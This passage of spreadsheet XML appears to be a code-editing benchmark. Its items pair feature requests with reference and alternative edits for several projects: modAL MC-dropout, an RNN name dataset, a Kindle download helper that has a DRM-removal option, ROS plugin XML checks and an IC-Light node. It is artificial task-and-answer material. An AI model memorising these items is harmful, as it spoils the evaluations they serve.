type(classifier.module_.convs[5])) or isinstance(module, type(classifier.module_.fcs[2])):\n                if idx not in dropout_layer_indexes:\n                    module.p = 0\n    \n    # Perform multiple forward passes\n    predictions = []\n    for _ in range(num_cycles):\n        classifier.train()\n        pred = classifier.predict_proba(X)\n        predictions.append(pred)\n    \n    predictions = np.array(predictions)\n    \n    # Calculate BALD score (Bayesian Active Learning by Disagreement)\n    mean_predictions = np.mean(predictions, axis=0)\n    entropy_mean = entropy(mean_predictions.T)\n    expected_entropy = np.mean([entropy(pred.T) for pred in predictions], axis=0)\n    bald_scores = entropy_mean - expected_entropy\n    \n    # #New Calculate uncertainty scores (standard deviation of predictions across cycles)\n    uncertainty_scores = np.std(predictions, axis=0).mean(axis=1)\n    \n    # Select instances with highest BALD scores\n    query_idx = np.argsort(bald_scores)[-n_instances:]\n    \n    # #Modify Return format based on return_uncertainty_scores flag\n    if return_uncertainty_scores:\n        metric_values = {\n            \'bald_scores\': bald_scores,\n            \'uncertainty_scores\': uncertainty_scores,\n            \'queried_uncertainty\': uncertainty_scores[query_idx]\n        }\n    else:\n        metric_values = bald_scores\n    \n    return query_idx, metric_values\n\n\n# File 2: modAL/examples/pytorch_mc_dropout.py\n# ... [previous code remains the same until the active learning loop] ...\n\n# the active learning loop\nn_queries = 10\nX_teach = X_initial\ny_teach = y_initial\n\nfor idx in range(n_queries):\n    print(\'Query no. %d\' % (idx + 1))\n    \n    # #Modify Query new data with return_uncertainty_scores enabled\n    query_idx, metric_values = learner.query(\n        X_pool, n_instances=100, dropout_layer_indexes=[7, 11], num_cycles=10, return_uncertainty_scores=True)\n    \n    # #New Extract uncertainty information if available\n    if isinstance(metric_values, dict):\n        bald_scores = metric_values[\'bald_scores\']\n        uncertainty_scores = metric_values[\'uncertainty_scores\']\n        queried_uncertainty = metric_values[\'queried_uncertainty\']\n        print(f"Mean uncertainty of queried instances: {np.mean(queried_uncertainty):.4f}")\n        print(f"Max uncertainty in pool: {np.max(uncertainty_scores):.4f}")\n    else:\n        bald_scores = metric_values\n    \n    # Add queried instances\n    X_teach = torch.cat((X_teach, X_pool[query_idx]))\n    y_teach = torch.cat((y_teach, y_pool[query_idx]))\n    learner.teach(X_teach, y_teach)\n\n    # remove queried instance from pool\n    X_pool = np.delete(X_pool, query_idx, axis=0)\n    y_pool = np.delete(y_pool, query_idx, axis=0)\n\n    # give us the model performance\n    print("Model score: {}".format(learner.score(X_test, y_test)))\n'}</t>
  </si>
  <si>
    <t>{'modAL/modAL/dropout.py': '#Modify\ndef mc_dropout_bald(learner, X, n_instances=1, dropout_layer_indexes=None, num_cycles=50, return_uncertainty=False):\n    # Implementation of the mc_dropout_bald query strategy\n    # ... existing code ...\n    if return_uncertainty:\n        return query_idx, metric_values, uncertainty_scores\n    else:\n        return query_idx, metric_values', 'modAL/examples/pytorch_mc_dropout.py': '#Modify\nquery_idx, metric_values, uncertainty_scores = learner.query(\n    X_pool, n_instances=100, dropout_layer_indexes=[7, 11], num_cycles=10, return_uncertainty=True)\n#New\nprint("Uncertainty Scores: {}".format(uncertainty_scores))'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class NameDataset(Dataset):\n    def __init__(self, is_train_set=False):\n        filename = \'./data/names_train.csv.gz\' if is_train_set else \'./data/names_test.csv.gz\'\n        with gzip.open(filename, "rt") as f:\n            reader = csv.reader(f)\n            rows = list(reader)\n        self.names = [row[0] for row in rows]\n        self.countries = [row[1] for row in rows]\n        self.len = len(self.countries)\n        self.country_list = list(sorted(set(self.countries)))\n    \n    def __getitem__(self, index):\n        return self.names[index], self.countries[index]\n    \n    def __len__(self):\n        return self.len', 'invoking_code_segment': 'if __name__ == \'__main__\':\n    names = [\'adylov\', \'solan\', \'hard\', \'san\']\n    classifier = RNNClassifier(N_CHARS, HIDDEN_SIZE, N_CLASSES)\n    for name in names:\n        arr, _ = str2ascii_arr(name)\n        inp = Variable(torch.LongTensor([arr]))\n        out = classifier(inp)\n        print("in", inp.size(), "out", out.size())\n    inputs = make_variables(names)\n    out = classifier(inputs)\n    print("batch in", inputs.size(), "batch out", out.size())', 'feature_description': 'Add a feature to filter out names and countries based on a specific length. This allows users to filter the dataset to only include names within a specified length range, enabling more controlled training and testing of the RNN classifier.', 'modified_complete_code': '# name_dataset.py - MODIFIED\nimport torch\nimport numpy as np\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nimport csv\nimport gzip\n\nclass NameDataset(Dataset):\n    """ Diabetes dataset."""\n\n    # Initialize your data, download, etc.\n    def __init__(self, is_train_set=False, min_length=None, max_length=None):\n        #New: Added min_length and max_length parameters\n        filename = \'./data/names_train.csv.gz\' if is_train_set else \'./data/names_test.csv.gz\'\n        with gzip.open(filename, "rt") as f:\n            reader = csv.reader(f)\n            rows = list(reader)\n\n        #Modify: Filter names and countries based on length\n        self.names = [row[0] for row in rows]\n        self.countries = [row[1] for row in rows]\n        \n        #New: Apply length filtering\n        if min_length is not None or max_length is not None:\n            filtered_data = []\n            for name, country in zip(self.names, self.countries):\n                name_len = len(name)\n                if (min_length is None or name_len &gt;= min_length) and (max_length is None or name_len &lt;= max_length):\n                    filtered_data.append((name, country))\n            if filtered_data:\n                self.names = [item[0] for item in filtered_data]\n                self.countries = [item[1] for item in filtered_data]\n        \n        self.len = len(self.countries)\n        self.country_list = list(sorted(set(self.countries)))\n\n    def __getitem__(self, index):\n        return self.names[index], self.countries[index]\n\n    def __len__(self):\n        return self.len\n\n    def get_countries(self):\n        return self.country_list\n\n    def get_country(self, id):\n        return self.country_list[id]\n\n    def get_country_id(self, country):\n        return self.country_list.index(country)\n\n# Test the loader\nif __name__ == "__main__":\n    dataset = NameDataset(False)\n    print(dataset.get_countries())\n    print(dataset.get_country(3))\n    print(dataset.get_country_id(\'Korean\'))\n\n    train_loader = DataLoader(dataset=dataset,\n                              batch_size=10,\n                              shuffle=True)\n\n    print(len(train_loader.dataset))\n    for epoch in range(2):\n        for i, (names, countries) in enumerate(train_loader):\n            print(epoch, i, "names", names, "countries", countries)\n\n---\n\n# 13_1_rnn_classification_basics.py - MODIFIED\nimport time\nimport math\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\n\nfrom name_dataset import NameDataset\nfrom torch.nn.utils.rnn import pack_padded_sequence, pad_packed_sequence\n\n# Parameters and DataLoaders\nHIDDEN_SIZE = 100\nN_CHARS = 128  # ASCII\nN_CLASSES = 18\n\nclass RNNClassifier(nn.Module):\n    def __init__(self, input_size, hidden_size, output_size, n_layers=1):\n        super(RNNClassifier, self).__init__()\n        self.hidden_size = hidden_size\n        self.n_layers = n_layers\n        self.embedding = nn.Embedding(input_size, hidden_size)\n        self.gru = nn.GRU(hidden_size, hidden_size, n_layers)\n        self.fc = nn.Linear(hidden_size, output_size)\n\n    def forward(self, input):\n        batch_size = input.size(0)\n        input = input.t()\n        print("  input", input.size())\n        embedded = self.embedding(input)\n        print("  embedding", embedded.size())\n        hidden = self._init_hidden(batch_size)\n        output, hidden = self.gru(embedded, hidden)\n        print("  gru hidden output", hidden.size())\n        fc_output = self.fc(hidden)\n        print("  fc output", fc_output.size())\n        return fc_output\n\n    def _init_hidden(self, batch_size):\n        hidden = torch.zeros(self.n_layers, batch_size, self.hidden_size)\n        return Variable(hidden)\n\ndef str2ascii_arr(msg):\n    arr = [ord(c) for c in msg]\n    return arr, len(arr)\n\ndef pad_sequences(vectorized_seqs, seq_lengths):\n    seq_tensor = torch.zeros((len(vectorized_seqs), seq_lengths.max())).long()\n    for idx, (seq, seq_len) in enumerate(zip(vectorized_seqs, seq_lengths)):\n        seq_tensor[idx, :seq_len] = torch.LongTensor(seq)\n    return seq_tensor\n\ndef make_variables(names):\n    sequence_and_length = [str2ascii_arr(name) for name in names]\n    vectorized_seqs = [sl[0] for sl in sequence_and_length]\n    seq_lengths = torch.LongTensor([sl[1] for sl in sequence_and_length])\n    return pad_sequences(vectorized_seqs, seq_lengths)\n\nif __name__ == \'__main__\':\n    #Modify: Create dataset with length filtering\n    dataset = NameDataset(is_train_set=False, min_length=3, max_length=8)\n    \n    names = [\'adylov\', \'solan\', \'hard\', \'san\']\n    #New: Filter names based on dataset length constraints\n    filtered_names = [name for name in names if 3 &lt;= len(name) &lt;= 8]\n    \n    classifier = RNNClassifier(N_CHARS, HIDDEN_SIZE, N_CLASSES)\n\n    for name in filtered_names:\n        arr, _ = str2ascii_arr(name)\n        inp = Variable(torch.LongTensor([arr]))\n        out = classifier(inp)\n        print("in", inp.size(), "out", out.size())\n\n    inputs = make_variables(filtered_names)\n    out = classifier(inputs)\n    print("batch in", inputs.size(), "batch out", out.size())'}</t>
  </si>
  <si>
    <t>{'name_dataset.py': '#Modify\nclass NameDataset(Dataset):\n    def __init__(self, is_train_set=False, max_length=None):\n        filename = \'./data/names_train.csv.gz\' if is_train_set else \'./data/names_test.csv.gz\'\n        with gzip.open(filename, "rt") as f:\n            reader = csv.reader(f)\n            rows = list(reader)\n        self.names = [row[0] for row in rows if max_length is None or len(row[0]) &lt;= max_length]\n        self.countries = [row[1] for row in rows if max_length is None or len(row[0]) &lt;= max_length]\n        self.len = len(self.countries)\n        self.country_list = list(sorted(set(self.countries)))\n    def __getitem__(self, index):\n        return self.names[index], self.countries[index]\n    def __len__(self):\n        return self.len\n    def get_countries(self):\n        return self.country_list\n    def get_country(self, id):\n        return self.country_list[id]\n    def get_country_id(self, country):\n        return self.country_list.index(country)', '13_1_rnn_classification_basics.py': '#Modify\nif __name__ == \'__main__\':\n    dataset = NameDataset(False, max_length=10)\n    print(dataset.get_countries())\n    print(dataset.get_country(3))\n    print(dataset.get_country_id(\'Korean\'))\n    train_loader = DataLoader(dataset=dataset,\n                              batch_size=10,\n                              shuffle=True)\n    print(len(train_loader.dataset))\n    for epoch in range(2):\n        for i, (names, countries) in enumerate(train_loader):\n            # Run your training process\n            print(epoch, i, "names", names, "countries", countries)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'kindle.download_books() and kindle.download_one_book() methods in the Kindle class', 'invoking_code_segment': 'download_selected_books() function and main() function in cli.py that call kindle.download_books() and kindle.download_one_book()', 'feature_description': 'Add a progress bar to the download process using tqdm library to display download progress for both individual books and overall download operations', 'modified_complete_code': '# File 1: kindle_download_helper/kindle.py (relevant methods to modify)\n# Note: These are the methods being called that need modification\n\n# #Modify - Add import at top of kindle.py\nfrom tqdm import tqdm\n\n# #Modify - Modify download_one_book method signature to accept progress callback\ndef download_one_book(self, book, device, index, filetype=\'EBOK\', progress_callback=None):\n    # existing code...\n    # #Modify - Add progress callback invocation\n    if progress_callback:\n        progress_callback(1)\n    # rest of existing code...\n\n# #Modify - Modify download_books method to use tqdm progress bar\ndef download_books(self, start_index=0, filetype=\'EBOK\'):\n    books = self.get_all_books(filetype=filetype)\n    device = self.find_device()\n    # #New - Add tqdm progress bar\n    with tqdm(total=len(books), initial=start_index, desc=\'Downloading books\') as pbar:\n        for i, book in enumerate(books[start_index:], start=start_index):\n            self.download_one_book(book, device, i, filetype=filetype, progress_callback=lambda x: pbar.update(x))\n    # existing code...\n\n# File 2: kindle_download_helper/cli.py (modifications)\n\n# #Modify - Add import at top\nimport argparse\nimport json\nimport logging\nimport os\nfrom tqdm import tqdm  # #New\nimport urllib3\n\nfrom kindle_download_helper.config import (\n    DEFAULT_OUT_DEDRM_DIR,\n    DEFAULT_OUT_DIR,\n    DEFAULT_OUT_EPUB_DIR,\n    DEFAULT_SESSION_FILE,\n)\nfrom kindle_download_helper.kindle import Kindle\n\nlogger = logging.getLogger("kindle")\nfh = logging.FileHandler(".error_books.log")\nfh.setLevel(logging.ERROR)\nlogger.addHandler(fh)\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n\n# #Modify - Update download_selected_books function to include progress bar\ndef download_selected_books(kindle, options):\n    print("Getting all books, please wait...")\n    books = kindle.get_all_books(filetype=options.filetype)\n    device = kindle.find_device()\n\n    for idx, book in enumerate(books):\n        print(\n            "Index: "\n            + "{:&gt;5d}".format(idx + 1)\n            + " | Title: "\n            + book["title"]\n            + " | asin: "\n            + book["asin"]\n        )\n\n    while True:\n        indices = input(\n            "Input the index of books you want to download, split by space (q to quit, l to list books).\\n"\n        ).split()\n\n        if indices[0] == "q":\n            break\n        elif indices[0] == "l":\n            for idx, book in enumerate(books):\n                print(\n                    "Index: "\n                    + "{:&gt;5d}".format(idx + 1)\n                    + " | Title: "\n                    + book["title"]\n                    + " | asin: "\n                    + book["asin"]\n                )\n            continue\n\n        downlist = []\n        flag = True\n        for idx in indices:\n            if idx.isnumeric() == False:\n                if ":" in idx:\n                    idx_begin, idx_end = [int(i) for i in idx.split(":")]\n                    extend_list = [i for i in range(idx_begin - 1, idx_end)]\n                    downlist.extend(extend_list)\n                else:\n                    print("Input error, please input numbers!!!")\n                    flag = False\n                    break\n            else:\n                downlist.append(int(idx) - 1)\n        if not flag:\n            continue\n\n        downlist = list(set(downlist))\n\n        if max(downlist) &gt;= len(books) or min(downlist) &lt; 0:\n            print(\n                "Input error, please input numbers between 1 and "\n                + str(len(books))\n                + "!!!"\n            )\n            continue\n\n        for idx in downlist:\n            print(\n                "Index: "\n                + "{:&gt;5d}".format(idx + 1)\n                + " | Title: "\n                + books[idx]["title"]\n                + " | asin: "\n                + books[idx]["asin"]\n            )\n        print("Downloading " + str(len(downlist)) + " books:")\n\n        while True:\n            flag = input("Continue? (y/n)")\n            if flag == "y" or flag == "n":\n                break\n            else:\n                print("Input error, please input y or n")\n        if flag == "n":\n            continue\n\n        # #Modify - Add tqdm progress bar for selected books download\n        with tqdm(total=len(downlist), desc=\'Downloading selected books\') as pbar:\n            for i, idx in enumerate(downlist):\n                print(\n                    "Downloading "\n                    + str(i + 1)\n                    + "/"\n                    + str(len(downlist))\n                    + " "\n                    + books[idx]["title"]\n                    + " ..."\n                )\n                kindle.download_one_book(books[idx], device, idx, filetype=options.filetype)\n                pbar.update(1)  # #New - Update progress bar\n        print("Download finished.")\n\n\ndef main():\n    logger.setLevel(os.environ.get("LOGGING_LEVEL", "INFO"))\n    logger.addHandler(logging.StreamHandler())\n    parser = argparse.ArgumentParser()\n    parser.add_argument("csrf_token", help="amazon or amazon cn csrf token", nargs="?")\n\n    cookie_group = parser.add_mutually_exclusive_group()\n    cookie_group.add_argument(\n        "--cookie", dest="cookie", default="", help="amazon or amazon cn cookie"\n    )\n    cookie_group.add_argument(\n        "--cookie-file", dest="cookie_file", default="", help="load cookie local file"\n    )\n\n    parser.add_argument(\n        "--cn",\n        dest="domain",\n        action="store_const",\n        const="cn",\n        default="com",\n        help="if your account is an amazon.cn account",\n    )\n    parser.add_argument(\n        "--jp",\n        dest="domain",\n        action="store_const",\n        const="jp",\n        default="com",\n        help="if your account is an amazon.co.jp account",\n    )\n    parser.add_argument(\n        "--de",\n        dest="domain",\n        action="store_const",\n        const="de",\n        default="com",\n        help="if your account is an amazon.de account",\n    )\n    parser.add_argument(\n        "--uk",\n        dest="domain",\n        action="store_const",\n        const="uk",\n        default="com",\n        help="if your account is an amazon.co.uk account",\n    )\n    parser.add_argument(\n        "--resume-from",\n        dest="index",\n        type=int,\n        default=1,\n        help="resume from the index if download failed",\n    )\n    parser.add_argument(\n        "--cut-length",\n        dest="cut_length",\n        type=int,\n        default=100,\n        help="truncate the file name",\n    )\n    parser.add_argument(\n        "-o", "--outdir", default=DEFAULT_OUT_DIR, help="download output dir"\n    )\n    parser.add_argument(\n        "-od",\n        "--outdedrmdir",\n        default=DEFAULT_OUT_DEDRM_DIR,\n        help="download output dedrm dir",\n    )\n    parser.add_argument(\n        "-oe",\n        "--outepubmdir",\n        default=DEFAULT_OUT_EPUB_DIR,\n        help="download output epub dir",\n    )\n    parser.add_argument(\n        "-s",\n        "--session-file",\n        default=DEFAULT_SESSION_FILE,\n        help="The reusable session dump file",\n    )\n    parser.add_argument(\n        "--pdoc",\n        dest="filetype",\n        action="store_const",\n        const="PDOC",\n        default="EBOK",\n        help="to download personal documents or ebook",\n    )\n    parser.add_argument(\n        "--resolve_duplicate_names",\n        dest="resolve_duplicate_names",\n        action="store_true",\n        help="Resolve duplicate names files to download",\n    )\n    parser.add_argument(\n        "--readme",\n        dest="readme",\n        action="store_true",\n        help="If you want to generate kindle readme stats",\n    )\n    parser.add_argument(\n        "--dedrm",\n        dest="dedrm",\n        action="store_true",\n        help="If you want to `dedrm` directly",\n    )\n    parser.add_argument(\n        "--list",\n        dest="list_only",\n        action="store_true",\n        help="just list books/pdoc, not to download",\n    )\n    parser.add_argument(\n        "--device_sn",\n        dest="device_sn",\n        default="",\n        help="Download file for device with this serial number",\n    )\n    parser.add_argument(\n        "--mode",\n        dest="mode",\n        default="all",\n        help="Mode of download, all: download all files at once, sel: download selected files",\n    )\n\n    options = parser.parse_args()\n\n    if not os.path.exists(options.outdir):\n        os.makedirs(options.outdir)\n    if not os.path.exists(options.outdedrmdir):\n        os.makedirs(options.outdedrmdir)\n    if not os.path.exists(options.outepubmdir):\n        os.makedirs(options.outepubmdir)\n\n    kindle = Kindle(\n        options.csrf_token,\n        options.domain,\n        options.outdir,\n        options.outdedrmdir,\n        options.outepubmdir,\n        options.cut_length,\n        session_file=options.session_file,\n        device_sn=options.device_sn,\n    )\n    kindle.to_resolve_duplicate_names = options.resolve_duplicate_names\n    kindle.dedrm = options.dedrm\n\n    if options.cookie_file:\n        with open(options.cookie_file, "r") as f:\n            kindle.set_cookie_from_string(f.read())\n    elif options.cookie:\n        kindle.set_cookie_from_string(options.cookie)\n    else:\n        kindle.is_browser_cookie = True\n\n    if options.list_only:\n        kindle.get_devices()\n        print(\n            json.dumps(\n                kindle.get_all_books(filetype=options.filetype),\n                indent=4,\n                ensure_ascii=False,\n            )\n        )\n        exit()\n\n    if options.readme:\n        kindle.make_kindle_stats_readme()\n    else:\n        if options.mode == "all":\n            # #Modify - download_books now includes progress bar internally\n            kindle.download_books(\n                start_index=options.index - 1, filetype=options.filetype\n            )\n        elif options.mode == "sel":\n            download_selected_books(kindle, options)\n        else:\n            print("mode error, please input all or sel")\n\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'file1': 'from tqdm import tqdm  # New\n\ndef download_one_book(self, book, device, index, filetype=\'EBOK\'):\n    # ... existing code ...\n    with tqdm(total=100, desc=f"Downloading {book[\'title\']}") as pbar:\n        def update_progress(block_num, block_size, total_size):\n            pbar.update(block_size)\n        self.download_book(book, device, filetype, callback=update_progress)  # Modify\n    # ... existing code ...', 'file2': 'for i, idx in enumerate(downlist):\n    print(\n        "Downloading "\n        + str(i + 1)\n        + "/"\n        + str(len(downlist))\n        + " "\n        + books[idx]["title"]\n        + " ..."\n    )\n    kindle.download_one_book(books[idx], device, idx, filetype=options.filetype)\nprint("Download finished.")'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'PluginXML class methods: contains_library() and insert_new_class()', 'invoking_code_segment': 'check_plugins() function that calls contains_library() and insert_new_class() methods', 'feature_description': 'Add a feature to log a warning if a plugin is not found in any of the plugin XML files. This will help developers identify plugins that are defined via macros but not properly registered in plugin XML configuration files.', 'modified_complete_code': '# File 1: roscompile/ros_introspection/src/ros_introspection/plugin_xml.py\nimport os.path\nfrom collections import OrderedDict\nfrom xml.dom.minidom import parse\nimport logging  # #New\n\nNS_PATTERN = \'%s::%s\'\nlogger = logging.getLogger(__name__)  # #New\n\nclass PluginXML:\n    def __init__(self, rel_fn, file_path):\n        self.rel_fn = rel_fn\n        self.file_path = file_path\n        self.has_class_libraries_tag = False\n        self.libraries = OrderedDict()\n        self.parent_pkgs = set()\n        self.changed = False\n\n        if os.path.exists(self.file_path):\n            self.read()\n\n    def read(self):\n        tree = parse(self.file_path)\n        self.has_class_libraries_tag = len(tree.getElementsByTagName(\'class_libraries\')) &gt; 0\n        for el in tree.getElementsByTagName(\'library\'):\n            path = el.getAttribute(\'path\').replace(\'lib/lib\', \'\')\n            cls = OrderedDict()\n            self.libraries[path] = cls\n            for clstag in el.getElementsByTagName(\'class\'):\n                d = {}\n                d[\'base_class_type\'] = clstag.getAttribute(\'base_class_type\')\n                self.parent_pkgs.add(d[\'base_class_type\'].split(\'::\')[0])\n                d[\'type\'] = clstag.getAttribute(\'type\')\n                d[\'name\'] = clstag.getAttribute(\'name\')\n                desc = \'\'\n                for tag in clstag.getElementsByTagName(\'description\'):\n                    if len(tag.childNodes) == 0:\n                        continue\n                    desc += str(tag.childNodes[0].nodeValue)\n                d[\'description\'] = desc\n                cls[d[\'type\']] = d\n\n    def contains_library(self, library_name, pkg, name):\n        if library_name not in self.libraries:\n            return False\n        full_name = NS_PATTERN % (pkg, name)\n        return full_name in self.libraries[library_name]\n\n    # #New - Add method to check if plugin exists and log warning if not\n    def check_plugin_exists(self, library_name, pkg, name):\n        """Check if plugin exists in library and log warning if not found."""\n        if not self.contains_library(library_name, pkg, name):\n            full_name = NS_PATTERN % (pkg, name)\n            logger.warning(f"Plugin \'{full_name}\' not found in library \'{library_name}\' in plugin XML file \'{self.rel_fn}\'")\n            return False\n        return True\n\n    def insert_new_class(self, library_name, pkg, name, base_pkg, base_name, description=\'\'):\n        if library_name not in self.libraries:\n            self.libraries[library_name] = OrderedDict()\n        library = self.libraries[library_name]\n        full_name = NS_PATTERN % (pkg, name)\n        library[full_name] = {\'base_class_type\': NS_PATTERN % (base_pkg, base_name),\n                              \'type\': full_name,\n                              \'description\': description}\n        self.changed = True\n\n    def write(self):\n        if not self.changed:\n            return\n        with open(self.file_path, \'w\') as f:\n            f.write(str(self))\n\n    def __repr__(self):\n        s = \'\'\n        indent = 0\n        need_class_libraries_tag = len(self.libraries) &gt; 1 or self.has_class_libraries_tag\n        if need_class_libraries_tag:\n            s += \'&lt;class_libraries&gt;\\n\'\n            indent += 2\n        for name, lib in self.libraries.items():\n            s += \' \' * indent + \'&lt;library path="lib/lib%s"&gt;\\n\' % name\n            for clib in lib.values():\n                s += self.class_str(clib, indent + 2)\n            s += \' \' * indent + \'&lt;/library&gt;\\n\'\n        if need_class_libraries_tag:\n            s += \'&lt;/class_libraries&gt;\\n\'\n        return s\n\n    def class_str(self, lib, indent):\n        s = \' \' * indent + \'&lt;class\'\n        for at in [\'name\', \'type\', \'base_class_type\']:\n            if at in lib and len(lib[at]) &gt; 0:\n                s += \' %s="%s"\' % (at, lib[at])\n        s += \'&gt;\\n\' + (\' \' * (indent + 2))\n        s += \'&lt;description&gt;%s&lt;/description&gt;\' % lib.get(\'description\', \'\')\n        s += \'\\n\' + (\' \' * indent) + \'&lt;/class&gt;\\n\'\n        return s\n\n# File 2: roscompile/roscompile/src/roscompile/plugins.py\nimport collections\nimport os\nimport re\nimport logging  # #New\n\nfrom ros_introspection.plugin_xml import PluginXML\nfrom .manifest import enforce_tabbing_helper\nfrom .util import roscompile\n\nlogger = logging.getLogger(__name__)  # #New\n\nPLUGIN_PATTERN = r\'PLUGINLIB_EXPORT_CLASS\\(([^:]+)::([^,]+),\\s*([^:]+)::([^,]+)\\)\'\nPLUGIN_RE = re.compile(PLUGIN_PATTERN)\n\ndef plugin_xml_by_package(package):\n    xmls = collections.defaultdict(list)\n    for xml in package.plugin_configs:\n        for parent_pkg in xml.parent_pkgs:\n            xmls[parent_pkg].append(xml)\n    return xmls\n\ndef contains_library(xmls, library, pkg, name):\n    for xml in xmls:\n        if xml.contains_library(library, pkg, name):\n            return True\n    return False\n\ndef lookup_library(build_rules, rel_fn):\n    for library, deps in build_rules.items():\n        if rel_fn in deps:\n            return library\n\n# #New - Add helper function to check if plugin exists in any XML and log warning\ndef check_plugin_in_xmls(xmls, library, pkg, name, xml_list):\n    """Check if plugin exists in any XML file and log warning if not found."""\n    for xml in xml_list:\n        if xml.check_plugin_exists(library, pkg, name):\n            return True\n    full_name = \'%s::%s\' % (pkg, name)\n    logger.warning(f"Plugin \'{full_name}\' defined via macro but not found in any plugin XML configuration file")\n    return False\n\n@roscompile\ndef check_plugins(package):\n    """Check that all the plugins are properly defined.\n\n    We have three dictionaries\n      * The plugins that are defined by macros (defined_macros)\n      * The plugins that have associated configuration files (existing_plugins)\n      * The plugins that are linked by the manifest. (plugin_xml_by_package)\n    First, we reconcile the macros with the files.\n    Then we handle the manifest.\n    Then we make sure that the specific classes are in the configurations\n    """\n    if not package.cmake:\n        return\n    defined_macros = package.source_code.search_for_pattern(PLUGIN_RE)\n    existing_plugins = plugin_xml_by_package(package)\n    defined_plugins = package.manifest.get_plugin_xmls()\n    build_rules = package.cmake.get_source_build_rules(\'add_library\', resolve_target_name=True)\n\n    for rel_fn, plugin_info in defined_macros.items():\n        library = lookup_library(build_rules, rel_fn)\n        # pkg2/name2 is the parent class\n        for pkg1, name1, pkg2, name2 in plugin_info:\n            # Create file if needed\n            if pkg2 not in existing_plugins:\n                xml_filename = \'%s_plugins.xml\' % pkg2\n                print(\'\\tCreating %s\' % xml_filename)\n                p_xml = PluginXML(xml_filename, os.path.join(package.root, xml_filename))\n                package.plugin_configs.append(p_xml)\n                existing_plugins[pkg2] = [p_xml]\n\n            # Make sure plugins are properly exported\n            for plugin_xml in existing_plugins[pkg2]:\n                if plugin_xml.rel_fn not in defined_plugins[pkg2]:\n                    ex_el = package.manifest.add_plugin_export(pkg2, plugin_xml.rel_fn)\n                    enforce_tabbing_helper(package.manifest, ex_el, 2)\n\n            # Make sure the class is in the files\n            if not contains_library(existing_plugins[pkg2], library, pkg1, name1):\n                # insert into first\n                xml = existing_plugins[pkg2][0]\n                xml.insert_new_class(library, pkg1, name1, pkg2, name2)\n            # #Modify - Add warning check for plugins not found in XML files\n            else:\n                check_plugin_in_xmls(existing_plugins[pkg2], library, pkg1, name1, existing_plugins[pkg2])'}</t>
  </si>
  <si>
    <t>{'#file 1': 'def contains_library(self, library_name, pkg, name):\n    if library_name not in self.libraries:\n        return False\n    full_name = NS_PATTERN % (pkg, name)\n    return full_name in self.libraries[library_name]  #Modify', '#file 2': "def contains_library(xmls, library, pkg, name):\n    for xml in xmls:\n        if xml.contains_library(library, pkg, name):\n            return True\n    print(f'Warning: Library {library} for package {pkg} and name {name} not found in any plugin XML files.')  #Modify\n    return False"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class ICLightConditioning: @classmethod def INPUT_TYPES(s): return {"required": {"positive": ("CONDITIONING", ), "negative": ("CONDITIONING", ), "vae": ("VAE", ), "foreground": ("LATENT", ), "multiplier": ("FLOAT", {"default": 0.18215, "min": 0.0, "max": 1.0, "step": 0.001}), }, "optional": { "opt_background": ("LATENT", ), }, } def encode(self, positive, negative, vae, foreground, multiplier, opt_background=None): samples_1 = foreground["samples"] if opt_background is not None: samples_2 = opt_background["samples"] repeats_1 = samples_2.size(0) // samples_1.size(0) repeats_2 = samples_1.size(0) // samples_2.size(0) if samples_1.shape[1:] != samples_2.shape[1:]: samples_2 = comfy.utils.common_upscale(samples_2, samples_1.shape[-1], samples_1.shape[-2], "bilinear", "disabled") if repeats_1 &gt; 1: samples_1 = samples_1.repeat(repeats_1, 1, 1, 1) if repeats_2 &gt; 1: samples_2 = samples_2.repeat(repeats_2, 1, 1, 1) concat_latent = torch.cat((samples_1, samples_2), dim=1) else: concat_latent = samples_1 out_latent = torch.zeros_like(samples_1) out = [] for conditioning in [positive, negative]: c = [] for t in conditioning: d = t[1].copy() d["concat_latent_image"] = concat_latent * multiplier n = [t[0], d] c.append(n) out.append(c) return (out[0], out[1], {"samples": out_latent})', 'invoking_code_segment': 'from .nodes import NODE_CLASS_MAPPINGS, NODE_DISPLAY_NAME_MAPPINGS __all__ = ["NODE_CLASS_MAPPINGS", "NODE_DISPLAY_NAME_MAPPINGS"]', 'feature_description': "Add support for an optional 'strength' parameter to control the influence of the 'concat_latent_image' in the conditioning. This parameter allows users to dynamically adjust how much the concatenated latent image affects the conditioning output, providing finer control over the IC-Light effect intensity.", 'modified_complete_code': '#file 1 - nodes.py (ICLightConditioning class modification): class ICLightConditioning: @classmethod def INPUT_TYPES(s): return {"required": {"positive": ("CONDITIONING", ), "negative": ("CONDITIONING", ), "vae": ("VAE", ), "foreground": ("LATENT", ), "multiplier": ("FLOAT", {"default": 0.18215, "min": 0.0, "max": 1.0, "step": 0.001}), }, "optional": { "opt_background": ("LATENT", ), #New "strength": ("FLOAT", {"default": 1.0, "min": 0.0, "max": 2.0, "step": 0.01}), }, } RETURN_TYPES = ("CONDITIONING","CONDITIONING","LATENT") RETURN_NAMES = ("positive", "negative", "empty_latent") FUNCTION = "encode" CATEGORY = "IC-Light" DESCRIPTION = """ Conditioning for the IC-Light model. To use the opt_background input, you also need to use the fbc version of the IC-Light models. #New Added \'strength\' parameter to control concat_latent_image influence. """ #Modify def encode(self, positive, negative, vae, foreground, multiplier, opt_background=None, strength=1.0): samples_1 = foreground["samples"] if opt_background is not None: samples_2 = opt_background["samples"] repeats_1 = samples_2.size(0) // samples_1.size(0) repeats_2 = samples_1.size(0) // samples_2.size(0) if samples_1.shape[1:] != samples_2.shape[1:]: samples_2 = comfy.utils.common_upscale(samples_2, samples_1.shape[-1], samples_1.shape[-2], "bilinear", "disabled") if repeats_1 &gt; 1: samples_1 = samples_1.repeat(repeats_1, 1, 1, 1) if repeats_2 &gt; 1: samples_2 = samples_2.repeat(repeats_2, 1, 1, 1) concat_latent = torch.cat((samples_1, samples_2), dim=1) else: concat_latent = samples_1 out_latent = torch.zeros_like(samples_1) out = [] for conditioning in [positive, negative]: c = [] for t in conditioning: d = t[1].copy() #Modify - Apply strength parameter to concat_latent_image d["concat_latent_image"] = concat_latent * multiplier * strength n = [t[0], d] c.append(n) out.append(c) return (out[0], out[1], {"samples": out_latent})'}</t>
  </si>
  <si>
